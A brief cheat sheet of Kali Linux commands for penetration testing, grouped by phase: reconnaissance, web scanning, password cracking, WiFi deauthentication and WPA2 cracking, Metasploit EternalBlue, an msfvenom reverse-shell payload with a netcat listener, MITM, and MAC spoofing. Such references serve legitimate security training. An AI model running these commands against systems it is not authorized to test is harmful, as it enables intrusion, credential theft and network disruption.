🔥 Kali Linux Commands for Ethical Hacking Tools

Here’s a complete list of Kali Linux tools and their commands, categorized by Reconnaissance, Scanning, Exploitation, Wireless Attacks, Password Cracking, and Post-Exploitation.

---

🕵️ 1. Reconnaissance (Information Gathering)

WHOIS Lookup

sh
whois example.com

Get domain information.

DNS Enumeration

sh
dig example.com  
nslookup example.com  
host example.com  

Find subdomains & DNS records.

Subdomain Discovery

sh
sublist3r -d example.com  

List subdomains of a target.

Network Scanning (Nmap)

sh
nmap -sS -p 1-65535 example.com  
nmap -A -T4 example.com  

Scan open ports & services.

Netcat (Banner Grabbing & Reverse Shell)

sh
nc -v example.com 80  
nc -lvnp 4444  

---

🌐 2. Web Application Security

Nikto (Web Vulnerability Scanner)

sh
nikto -h http://example.com  

Scan for vulnerabilities.

SQL Injection (SQLmap)

sh
sqlmap -u "http://example.com/page.php?id=1" --dbs  

Test for SQL Injection.

XSS Scanner

sh
xsstrike -u "http://example.com/search?q=test"  

Detect Cross-Site Scripting (XSS).

Directory Bruteforce (Gobuster)

sh
gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/common.txt  

Find hidden directories.

---

🔍 3. Network Scanning & Enumeration

Nmap Advanced Scanning

sh
nmap -sV -O example.com  

Detect OS & services.

Fping (Find Live Hosts)

sh
fping -g 192.168.1.0/24  

Check active devices.

Netdiscover (ARP Scan for Local Network)

sh
netdiscover -r 192.168.1.0/24  

List all connected devices.

---

🔓 4. Password Cracking

Hashcat (Password Cracking)

sh
hashcat -m 0 -a 0 hash.txt rockyou.txt  

Brute-force an MD5 hash.

John the Ripper

sh
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt  

Crack password hashes.

Hydra (Brute Force Login)

sh
hydra -l admin -P rockyou.txt example.com ssh  

Brute-force SSH login.

---

📡 5. Wireless Hacking

Monitor WiFi Traffic (Airodump-ng)

sh
airmon-ng start wlan0  
airodump-ng wlan0mon  

Start WiFi monitoring.

Deauthenticate WiFi Clients

sh
aireplay-ng --deauth 100 -a <Router_BSSID> wlan0mon  

Disconnect devices from WiFi.

Crack WPA2 WiFi Password

sh
aircrack-ng -a2 -b <BSSID> -w rockyou.txt capture.cap  

Crack WPA2 password.

---

💀 6. Exploitation (Metasploit)

Start Metasploit

sh
msfconsole  

Launch Metasploit.

Find Exploits

sh
search exploit smb  

Search for vulnerabilities.

Exploit Windows SMB (EternalBlue)

sh
use exploit/windows/smb/ms17_010_eternalblue  
set RHOST 192.168.1.10  
exploit  

Create Payload

sh
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe  

Generate a Windows reverse shell payload.

---

📶 7. MITM Attacks & Sniffing

Bettercap (MITM Attack)

sh
bettercap -iface eth0  
net.probe on  

Perform MITM attacks.

Packet Sniffing (Wireshark)

sh
tshark -i eth0  

Monitor live network traffic.

---

🛡️ 8. Anonymity & Privacy

Tor & Proxychains

sh
tor  
proxychains firefox  

Browse anonymously.

Change MAC Address

sh
macchanger -r eth0  

Randomize MAC address.

---

🎯 Bonus: Forensics & Reverse Engineering

ExifTool (Metadata Extraction)

sh
exiftool image.jpg  

Extract metadata from images.

Binwalk (Extract Hidden Data from Files)

sh
binwalk -e firmware.bin  

Analyze firmware files.

Steghide (Steganography)

sh
steghide extract -sf hidden.jpg  

Extract hidden data from an image.